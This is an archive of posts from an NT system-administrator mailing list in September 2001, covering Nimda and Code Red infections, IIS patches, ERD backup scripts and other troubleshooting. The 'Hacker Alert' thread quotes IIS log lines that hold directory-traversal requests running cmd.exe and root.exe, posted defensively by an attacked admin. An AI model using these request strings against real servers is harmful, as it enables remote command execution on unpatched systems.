Subject: RE: WARNING: Hacker Alert
Importance: High


> This is a real can of super ugly worms and you need a total
> security policy for your site not just blocking executables via email.

Tell me about it. I have 13 servers here, 3 of them *nix. All of them
survived except one which got hit, because it had a trust relationship with
a web designer's home machine and he got hit.

Keeping all these machines up to date is a royal pain in the ass - since
Microsloth haven't seen fit to include the hotfixes in their 'windowsupdate'
site for NT4 yet.

I remember seeing a URL somewhere of a useful gadget for telling you which
servers had which patches, and which servers needed which patches but now
that I need it, I'll be damned if I can find it... :(

Anyone out there with a better memory?

Regards

Bob


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: IIS4/5 patches

[Clark, Steve]

Title: IIS4/5 patches









Another option
is to use a product list St Bernard Update Expert that demonstrates the updates
and will download them for you.

 

Sorry –
shameless plug from a reseller. ;)

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Allen Crawford
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001
3:40 PM
To: NT System Admin Issues
Subject: IIS4/5 patches

 

If anyone is struggling
with getting current on locking down your IIS servers, I have spent some time
creating an HTML page with links to the downloads, except that I've created it
for our LAN.  So, I can email you the self-extracting zipped
up version of it offline if you are interested.  I don't think I've left
anything out of it, but I wouldn't be surprised if I missed a few items. 
It includes the Post-SP6
NT 4 security rollup as well, which adds a good
14MB to the file size, so I can remove that if you would like.

Anyway, I'm emailing
this list so hopefully it can help push the admins to install these updates
that haven't done so already so we can start putting an end to this Code Red
stuff.  Of course, if you are already infected you'll need to get yourself
clean.  Does eEye have that Code Red scanner available still? 
Doesn't it detect if you are already infected and clean it?  I can't
remember and couldn't find it last time I checked their site.  However,
the last I checked was a while back.  I'm leaving for the day so I don't
have time to check it now and won't get any replies to this message until
tomorrow.

Trying to be of
assistance to people that are short on time and haven't updated their servers
since I personally have found Microsoft's web pages to be extremely cluttered
and hard to figure out what you should and shouldn't install.

 

Allen

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: WARNING: Hacker Alert

[Clark, Steve]

http://vil.nai.com/vil/virusSummary.asp?virus_k=99209

link to the download is hidden in the removal section.

I also put links to it off my website and the download fix 

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: www.kenmcphail.com [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:45 PM
To: NT System Admin Issues
Subject: Re: WARNING: Hacker Alert

Where? http://download.mcafee.com/updates/updates.asp? not there?
- Original Message -
From: "Clark, Steve" <[EMAIL PROTECTED]>
To: "NT System Admin Issues" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 2:29 PM
Subject: RE: WARNING: Hacker Alert


McAfee posted an updated DAT and removal tool.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:17 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert


No pattern update or cleaner tool available yet from Symantec.   Probably
soon.




Mark Kelsay


<[EMAIL PROTECTED]>
   cc:

09/18/2001 Subject: RE: WARNING: Hacker
Alert
11:02 AM

Please respond

to "NT System

Admin Issues"







Anyone posting fixes for this once you are infected?  I have looked but
have
yet to find any.  I am running Norton Corporate Edition 7.5.

Mark

-Original Message-
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert


All my public facing web servers at home and at my office have shown a huge
continuous hacking activity. Has anyone seen similar? I fear this may be
code red related or automated. Please comment if you have seen similar.
Here
is an excerpt from one logfile:

63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0,
500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604,
404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 63.101.9.107,
-, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01,
10:36:32,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32,
W3SVC4,
DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0,
98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0,
500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107,
-, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01,
10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01,
10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET,
/mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70,
604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET,
/c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02,
W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01,
10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0,
500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x,
0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41,
13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -,
9/18/01,
10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/scripts/winnt/s

RE: serious network down...readme.eml??

[Clark, Steve]

Title: Message









Got this from Peter Kruse who pointed me to http://www.norman.no/
- thanks!

 

The worm W32/Nimda.A@mm is spreading very
fast. It may arrive as an email with the following charteristics:
Subject: None
Body: None
Attachment name: README.EXE
This worm may enter a computer in several ways - it will either be received as
an email with an attachment, over open shared drives in networks, and it seems
that it will also attempt to break into machines running the web server
software IIS (Internet Information Server), utilizing various security holes
well known . All IIS web server admins are encouraged to patch up their web
server to protect themselves. An accumulative patch for IIS servers is
available from: http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
When the infected file is run, it will copy itself to the system directory as a
hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so
that it is run from startup.

 

It may not remove everything – but it may
stop it long enough to see what damage was done.

 

Steve Clark

Clark Systems
Support, LLC

www.clarksupport.com

 

-Original
Message-
From: Zangara, Jim
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001
12:53 PM
To: NT System Admin Issues
Subject: RE: serious network
down...readme.eml??

 

we are getting it as well.  we already blocked the readme.exe
that comes with it - in our cases it is trying to launch a windows media
player.  update your file filter to block *.eml and *.nws per
antigen.  They re working on a more comprehensive fix.

 

Have not seen the problems you reported with it though - it only
appears to launch the media player - share your c drive and propagate here.

 

 

Jim
Zangara, MCSE+I 
Special Projects Engineer 
Premiere Radio Networks 
A Division of Clear Channel Communications

15260 Ventura Blvd Suite 500 
Sherman Oaks, CA 91403 
Direct: (818) 461-8620 
mailto:[EMAIL PROTECTED]


 

Even the boldest zebra fears the hungry lion. 

-Original Message-
From: Terry Manolakos
[mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001
9:21 AM
To: NT System Admin Issues
Subject: serious network
down...readme.eml??

My network is slammed with
some uknown virus of some sort.Both my NT 4.0 servers running MS-Exchange
6.5 have about 2300 alien files which were deleteda "readme.eml"
is being executed by all users somehow automtically and its infecting all my NT
domain.   I can not Ctrl+Alt+Delete to log into any of the
servers.the display shows "initialization of the dynamic link library
C:\WINNT\system32\USER32.dll failed. The process is terminating
abnormally"  OKaying this results in no effectsall servers have
this displayed onscreen.  For the ones that have admin already logged in,
Services (control panel, settings) can not be accessed!  "access to
the specified device, path, or file is denied"it seems this virus has
locked onto this element.  PDC is running Exchange (I know, never put'em
together...but we're still cleaning up after previous SysAdmins here), and this
has gone bezerk as well, with the same message onscreen.  Norton/Symantec
doesn't recognize "readme.eml"who out there can shine a flashlite
in this dark mess?  thanks in advance.

Terry  

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: WARNING: Hacker Alert

[Clark, Steve]

McAfee posted an updated DAT and removal tool.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:17 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert


No pattern update or cleaner tool available yet from Symantec.   Probably
soon.


 

Mark Kelsay


<[EMAIL PROTECTED]>  
   cc:

09/18/2001 Subject: RE: WARNING: Hacker
Alert   
11:02 AM

Please respond

to "NT System

Admin Issues"

 

 



Anyone posting fixes for this once you are infected?  I have looked but
have
yet to find any.  I am running Norton Corporate Edition 7.5.

Mark

-Original Message-
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert


All my public facing web servers at home and at my office have shown a huge
continuous hacking activity. Has anyone seen similar? I fear this may be
code red related or automated. Please comment if you have seen similar.
Here
is an excerpt from one logfile:

63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0,
500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604,
404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 63.101.9.107,
-, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01,
10:36:32,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32,
W3SVC4,
DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0,
98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0,
500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107,
-, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01,
10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01,
10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET,
/mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70,
604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET,
/c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02,
W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01,
10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0,
500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x,
0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41,
13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -,
9/18/01,
10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01,
10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01,
10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01,
10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,

Virus Update

[Clark, Steve]

Got this from Peter Kruse who pointed me to http://www.norman.no/
- thanks!

 

The worm W32/Nimda.A@mm is spreading very
fast. It may arrive as an email with the following charteristics:
Subject: None
Body: None
Attachment name: README.EXE
This worm may enter a computer in several ways - it will either be received as
an email with an attachment, over open shared drives in networks, and it seems
that it will also attempt to break into machines running the web server
software IIS (Internet Information Server), utilizing various security holes
well known . All IIS web server admins are encouraged to patch up their web
server to protect themselves. An accumulative patch for IIS servers is
available from: http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
When the infected file is run, it will copy itself to the system directory as a
hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so
that it is run from startup.

 

It may not remove everything – but it may
stop it long enough to see what damage was done.

 

Steve Clark

Clark Systems Support, LLC

www.clarksupport.com

 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: serious network down...readme.eml??

[Clark, Steve]

Title: serious network down...readme.eml??









Got this from Peter Kruse who pointed me to http://www.norman.no/
- thanks!

 

The worm W32/Nimda.A@mm is spreading very
fast. It may arrive as an email with the following charteristics:
Subject: None
Body: None
Attachment name: README.EXE
This worm may enter a computer in several ways - it will either be received as
an email with an attachment, over open shared drives in networks, and it seems
that it will also attempt to break into machines running the web server
software IIS (Internet Information Server), utilizing various security holes
well known . All IIS web server admins are encouraged to patch up their web
server to protect themselves. An accumulative patch for IIS servers is
available from: http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
When the infected file is run, it will copy itself to the system directory as a
hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so
that it is run from startup.

 

It may not remove everything – but it may
stop it long enough to see what damage was done.

 

Steve Clark

Clark Systems
Support, LLC

www.clarksupport.com

 

 

-Original
Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001
1:24 PM
To: NT System Admin Issues
Subject: RE: serious network
down...readme.eml??

 

Stupid Ev
Question #327: eml files can be executed? 

 

Thanks,

 

Evan

 

-Original
Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001
1:05 PM
To: NT System Admin Issues
Subject: RE: serious network
down...readme.eml??

 

1   
Unplug servers form network.

2   
use ERD to recover.

3   
send users home.

4   
clean clients.

-Original
Message-
From: Terry Manolakos
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001
12:21 PM
To: NT System Admin Issues
Subject: serious network
down...readme.eml??

My
network is slammed with some uknown virus of some sort.Both my NT 4.0
servers running MS-Exchange 6.5 have about 2300 alien files which were
deleteda "readme.eml" is being executed by all users somehow
automtically and its infecting all my NT domain.   I can not
Ctrl+Alt+Delete to log into any of the servers.the display shows
"initialization of the dynamic link library C:\WINNT\system32\USER32.dll
failed. The process is terminating abnormally"  OKaying this results
in no effectsall servers have this displayed onscreen.  For the ones
that have admin already logged in, Services (control panel, settings) can not
be accessed!  "access to the specified device, path, or file is
denied"it seems this virus has locked onto this element.  PDC is
running Exchange (I know, never put'em together...but we're still cleaning up
after previous SysAdmins here), and this has gone bezerk as well, with the same
message onscreen.  Norton/Symantec doesn't recognize
"readme.eml"who out there can shine a flashlite in this dark
mess?  thanks in advance.

Terry  

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Virus Update

[Clark, Steve]

Got this from Peter Kruse who pointed me to http://www.norman.no/ - thanks!

 

The worm W32/Nimda.A@mm is spreading very
fast. It may arrive as an email with the following charteristics:
Subject: None
Body: None
Attachment name: README.EXE
This worm may enter a computer in several ways - it will either be received as
an email with an attachment, over open shared drives in networks, and it seems
that it will also attempt to break into machines running the web server
software IIS (Internet Information Server), utilizing various security holes
well known . All IIS web server admins are encouraged to patch up their web
server to protect themselves. An accumulative patch for IIS servers is
available from: http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
When the infected file is run, it will copy itself to the system directory as a
hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so
that it is run from startup.

 

It may not remove everything – but it may
stop it long enough to see what damage was done.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Win2K looping upon bootup

[Clark, Steve]

Title: Message









Have made
the same mistake – I found that starting in safe mode, remove – reboot – reinstall
9 and update to 9.2 resolves it.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Jim Holmgren
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001
9:18 AM
To: NT System Admin Issues
Subject: RE: Win2K looping upon
bootup

 

I can vouch for that,
I've seen it as well...several times.  We use TS on the servers, but we
still need Remote Control on some of the 2K Pro workstations.  

You MUST update from v9.0
to 9.2 before rebooting.  LiveUpdate will do this for you.  If
this is what happened, we've fixed it on workstations (IDE) by removing the
HDD, setting it up as a slave on a known-good machine and copying
some files to it from a working version.  You can PM me if you happen
to need more details.

 

Jim

 

Jim Holmgren
MCSE, CCNA 
[EMAIL PROTECTED] 
Network Engineer 
Advertising.com 

Anytime,
anywhere, any Internet channel-- we touch tens of millions online each day. 
Advertising.com--
Superior Technology, Superior Performance. 

-Original
Message-
From: Terry Manolakos
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001
9:14 AM
To: NT System Admin Issues
Subject: RE: Win2K looping upon
bootup

I think what was meant
was to install 9.0 first, but before rebooting, install 9.2, then reboot;
otherwise, it crashes after 9.0 and its reboot

-Original
Message-
From: Greg Page
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 17, 2001
8:48 PM
To: NT System Admin Issues
Subject: RE: Win2K looping upon
bootup

You're
supposed to update to 9.21 before you go to 9.0? What's wrong with this
picture?

 

 

Greg

-Original
Message-
From: Daniel Burns
[mailto:[EMAIL PROTECTED]] 
Sent: Monday, September 17, 2001
6:24 PM
To: NT System Admin Issues
Subject: Re: Win2K looping upon
bootup

Has anything
been added to the computer: software, hardware, etc??  I've seen this with
putting pcAnywhere 9.0 on a Win2K system without first updating it to 9.21
before reboot.  

Daniel

 



- Original Message - 



From: Konrad Kliewer 



To: NT System Admin Issues 

Sent: Friday,
September 14, 2001 3:53 PM

Subject: RE: Win2K looping upon bootup

 

I
have seen this problem with computers with marginal power supplies.  You
might want to check and see if your power supply is going bad.








The machine was rebuilt from scratch; no GHOST.  It was
working fine for several months up until a day or so ago. 





-Original Message- 

From: Heavner, Charlie [mailto:[EMAIL PROTECTED]]


Sent: Friday, September 14, 2001 4:16 PM 

To: NT System Admin Issues 

Subject:
RE: Win2K looping upon bootup

are you trying to build the machine from ghost image? If so, your
may controller card issues or the image could have been built on a hard drive
that is bigger than the destination drive. those 2 issues caused boot-loops for
me when I first started working with ghost. 

-Original Message- 

From: Terry Manolakos [mailto:[EMAIL PROTECTED]]


Sent: Friday, September 14, 2001 4:16 PM 

To: NT System Admin Issues 

Subject:
Win2K looping upon bootup

Firstly, my heart goes out to all those families who lost loved
ones in that tragic attack.  This e-mail list helped me deal with the
emotional torment that I felt from the very first day of the attack. 
Reading through 350+ e-mails relating to the attack made me feel very close to
the pain/frustration of the citizens of the United States as well as others
throughout the rest of the world.  

  I have an issue that may be trivial
to some but I'll ask anyway.  Win2K machine on a Dell Precision 410
(Pentium II with 128Mb RAM (ecc) Diamond Pro FireGl video card) does not get
past the "starting Windows 2000" (screen with the horizontal bar
graph loading)...it just reboots again over and over, looping. 
Memory, HDD, CPU or video card failure may be the culprit(s) but the system is
in a remote location and these can not be ruled out so easily.  Booting up
in Safe mode results in same problem.  Any ideas as to how to isolate the
problem remotely?  Thanks in advance! 

Ted M 

eNGENU!TY Technologies 

Montreal, Canada 

Visit us at: 

http://www.engenuitytech.com 

http://www.virtualprototypes.ca 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





 

Konrad
Kliewer

Staff
Engineer

Jonathan
Amy Facility for Chemical Instrumentation

Dept.
of Chemistry  

Purdue
University

West
Lafayette, IN 47907-1393
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http:

RE: Automated ERD's?

[Clark, Steve]

Title: Message









Greg – 

 

Here’s
what I do:

 

Each
Sunday night at 0 dark thirty, this bath file runs:

@echo off

REM   Created
by Steve Clark - Clark Systems Support, LLC

REM   to
automatically backup the registry and such

REM   Copies
to \\server\drivers\erd\%computername%

REM   Date:
2/17/00

%windir%\system32/rdisk /s-

if not exist d:\drivers\winnt\erd\%computername% md
d:\drivers\winnt\erd\%computername%

copy %windir%\repair\*.*
d:\drivers\winnt\erd\%computername%\

 

The one
time per month, I email the zip files to myself using BLAT

REM This will email the ERD for all 

REM servers
at office

REM Created
6/10 by Steve Clark - Clark Systems Support, LLC

REM --

d:\drivers\winnt\erd\pkzip.exe d:\drivers\winnt\erd\server.zip
d:\drivers\winnt\erd\server\*.*

c:\blat\blat c:\blat\erd.txt -s "ERD's for office"
-t [EMAIL PROTECTED] -attach d:\drivers\winnt\erd\server.zip

 

It may not
be the prettiest solution but I now have the ERD’s in my office, on the backup
tape as well as on a different server than the source. 

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Greg Page [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 17, 2001
10:00 PM
To: NT System Admin Issues
Subject: RE: Automated ERD's?

 

How about the direct
link!

 

 

Greg

-Original Message-
From: Alston, Steve
[mailto:[EMAIL PROTECTED]] 
Sent: Monday, September 17, 2001
4:29 PM
To: NT System Admin Issues
Subject: RE: Automated ERD's?

There was a script in the Feb 2001 edition
of Windows 2000 Magazine.  You should be able to get it from their website
www.win2000mag.com

 

HTH

 

STeve

-Original
Message-
From: Roger Wright
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 17, 2001
4:30 PM
To: NT System Admin Issues
Subject: Automated ERD's?

I know there are a
couple products to help automate the ERD generation process, but do any of you
have a script or batch file to do the same thing?  Care to share?

 

What central location do
you recommend for storing these files?  What happens if it crashes?

 

Roger Wright

Southern Commerce Bank

___

 

 

If you don't
go to people's funerals, they won't come to yours. 

 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




___

NOTICE: The information contained in this electronic message
is considered privileged and confidential under Florida Statutes 455.251 and
3905.017. It is intended solely for the use of the recipient named above. If
the reader is not the recipient named above, you are hereby notified that any
dissemination, distribution, copying or disclosure of the contents of this
message is prohibited. If you have received this e-mail message in error,
please immediately notify the sender and destroy the original message. 

 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Printers

[Clark, Steve]

Check for newer drivers on the vendor's web site. What do your logs say?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: HADI, ALI (ALI)** CTR ** [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 17, 2001 9:20 AM
To: NT System Admin Issues
Cc: XAVIER, Stephane (Stephane)** CTR **
Subject: Printers


Hi al ,

I have a problem with a printer (Qms2425) when installing this on either NT4
or W2k it immediately shuts the PC down > anyone has any ideas ?

Thanks,



Best Regards / Meilleures salutations

Ali Hadi
Compaq EUS Technicien/France Incident Mgr
Lucent Technologies
16 Avenue Descartes
92350 Plessis Robinson
France
Tel : 00 331 41 28 5596  Email: [EMAIL PROTECTED]


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: VPN's

[Clark, Steve]

Netscreen’s
are the easiest that I’ve seen. Don’t know if you can do it over a Frame Relay –
don’t have any experience on that.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: SysAdm
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 17, 2001
1:44 AM
To: NT System Admin Issues
Subject: VPN's

 

Hi
everybody,

 

Very
general question. My company is interested in changing from Frame Relay to VPN.
It looks very interesting to us, especially since you can save quite a bit of
money with it, but 

 

Who has
made experiences with VPN's, good ones or bad ones. What about security,
bandwidth, reliability etc. Am interested in any information.

 

Thanks.

 

Regards,
